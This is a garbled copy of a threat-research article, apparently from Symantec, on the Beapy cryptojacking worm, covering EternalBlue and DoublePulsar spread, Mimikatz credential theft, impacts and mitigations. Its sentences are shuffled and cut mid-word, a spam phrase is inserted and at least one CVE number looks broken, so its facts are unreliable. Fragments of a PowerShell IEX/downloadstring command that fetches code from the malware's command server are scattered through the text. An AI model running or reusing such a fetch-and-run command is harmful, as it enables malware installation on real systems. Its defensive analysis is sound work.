June 29, 2020

The announcement that the Coinhive coin-mining service

Beapy (W32. Beapy also uses a hardcoded list of usernames and passwords to attempt to spread across networks. However, EternalBlue isn’t Beapy’s only propagation technique, and it also uses the credential-stealing tool Hacktool. The service, which made it a lot easier for anyone to carry out browser-based coin mining, ceased operations at the start of March.MimikatzMSH.WebClient). This vulnerability was patched in 2017, but if successfully exploited it can allow for remote code execution.downloadstring(http://v.This mirrors a trend we saw in ransomware in 2018 too when, despite a drop in overall ransomware infections of 20 percent, ransomware infections in enterprises increased by 12 percent. Looking at the overall figures for cryptojacking, we can see that there were just under 3 million cryptojacking attempts in March 2019.-Educate employees about the signs that indicate their computer may have a coinminer and instruct them to inform IT immediately if they think there may be a coinminer on a device that is on the company network. If the email recipient opens the malicious attachment, the DoublePulsar backdoor (Backdoor. However, the activity is similar, with the downloaded malware also containing Mimikatz modules for credential harvesting, as well as EternalBlue exploit capabilities.

Almost all of Beapy’s victims are enterprises (Figure 1).-Install the latest patches on your devices, use strong passwords and enable two-factor authentication. Activity targeting this web server continued until early April.Beapy appears to use unpatched machines to get a foothold on the network, and then uses EternalBlue to spread to other machines.As well as these factors, file-based coinminers also have a significant advantage over browser-based coinminers because they can mine cryptocurrency faster.-Educate anyone using your device or network and urge them to exercise caution around emails from unfamiliar sources and around opening attachments that haven’t been solicited, which may contain file-based coin-mining malware.Effects of cryptojacking on enterprisesWhile enterprises might think they don’t need to worry about cryptojacking as much as more disruptive threats such as ransomware, it could still have a major impact on the company’s operations.ProtectionSymantec has the following protection in place to protect customers against these kinds of attacks:W32.Doublepulsar. Some more PowerShell commands are executed and then a coinminer is downloaded. DoublePulsar, like EternalBlue, was leaked in the Shadow Brokers dump and was also used in the destructive WannaCry ransomware attack in 2017.

The announcement that the Coinhive coin-mining service, which was launched in September 2017 and played a key role in the growth of cryptojacking, was closing down also probably contributed to the fall in browser-based cryptojacking.Infection chainMalicious emails are the initial vector for at least some Beapy infections.What does Beapy’s activity tell us?Despite the drop in cryptojacking activity in 2018, when there was a 52 percent drop in cryptojacking, this is still an area of interest for cyber criminals. This activity has also been seen on web servers and has been increasing since the beginning of March. The Monero cryptocurrency, which is the cryptocurrency most commonly mined during cryptojacking attacks, dropped in value by 90 percent in 2018, so it may make sense that miners that can create more cryptocurrency faster are now more popular with cyber criminals.Bluwimps) in 2018 and which we mentioned in ISTR 24—an increased focus by cryptojacking criminals on enterprises. A malicious Excel document is delivered to victims as an email attachment. This includes deployment of endpoint, email, and web gateway protection technologies as well as firewalls and vulnerability assessment solutions.Doublepulsar) is downloaded onto the target machine.Mimikatz to attempt to collect credentials from infected computers. It can use those to spread to even patched machines on the network.com/v+$env:USERDOMAIN)This is the device contacting the Beapy C&C server.Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. Enterprises appear to be an increasing focus for cyber criminals. EternalBlue exploits a vulnerability in the Windows SMB protocol to allow files to spread laterally across networks. Beapy also tried to exploit known vulnerabilities in Apache Tomcat (CVE-2017-12615) and the Oracle WebLogic Server (CVE-2017-10271).

This is similar to how the Bluwimps worm operated.Beapy is most heavily affecting enterprises in Asia, with more than 80 percent of its victims located in China, with other victims in South Korea, Japan, and Vietnam. This campaign demonstrates that while cryptojacking has declined in popularity with cyber criminals since its peak at the start of 2018, it is still a focus for some of them, with enterprises now their primary target.In general, Beapy activity has been increasing since the beginning of March.BluwimpsBackdoor. If we look at one example of a machine in Symantec telemetry, we see the earliest signs of suspicious activity on February 15, 2019, when the DoublePulsar backdoor is detected. The shuttering of this service is likely to have a dramatic impact on browser-based cryptojacking. While we have no evidence these attacks are targeted, Beapy’s wormlike capabilities indicate that it was probably always intended to spread throughout enterprise networks. One of the ways it appears to do this is by generating a list of IP addresses it attempts to infect.Beapy) is a file-based coinminer that uses email as an initial infection vector.beahh.Beapy is a file-based coinminer, which is interesting as most of the cryptojacking activity we saw at the height of its popularity was carried out using browser-based coinminers, which were popular due to lower barriers to entry and because they allowed even fully patched machines to be targeted.Mitigation-Emphasize multiple, overlapping, and mutually supportive defensive systems to guard against single point failures in any specific technology or protection method. We then see a PowerShell command being launched, which decodes to the following:IEX (New-Object Net.Once DoublePulsar is installed, a PowerShell command is executed, and contact is made with the Beapy command and control (C&C) server, before a coinminer is downloaded onto the target computer.In the web server compromise, Beapy also attempted to exploit an Apache Struts vulnerability (CVE-2017-563 .The version of Beapy seen on the web server is an early version of the malware, coded in C rather than Python, like later versions.Potential impacts of cryptojacking for businesses include.

A slowdown in devices’ performance, potentially leading to employee frustration and a reduction in productivity-Overheating batteries-Devices becoming degraded and unusable, leading to higher IT costs-Increased costs due to increased electricity usage, and for businesses operating in the cloud that are billed based on CPU usage-Enterprises need to ensure their networks are protected from the whole range of cyber security threats. Beapy activity was first seen in Symantec telemetry in January 2019. DoublePulsar opens a backdoor on infected machines and allows for remote code execution on compromised computers.-Monitor battery usage on your device and, if light box signs Suppliers you notice a suspicious spike in usage, scan it for the presence of any file-based miners. Bluwimps infected thousands of enterprise machines with coinminers in 2017 and 2018. Always keep these security solutions up to date with the latest protection capabilities. While a big drop from the peak of February 2018, when there were 8 million cryptojacking attempts, it is still a significant figure. In the case of this web server compromise observed by Symantec, exploit attempts began in early February, with connections to Beapy’s C&C server first observed on March 13.BeapyHacktool. This process is repeated as Beapy spreads to other computers on the network.Web serversSymantec telemetry also found an earlier version of Beapy on a public-facing web server, with the worm then attempting to spread to computers connected to that server. Beapy may indicate a continuation of a trend demonstrated by the Bluwimps worm (MSH

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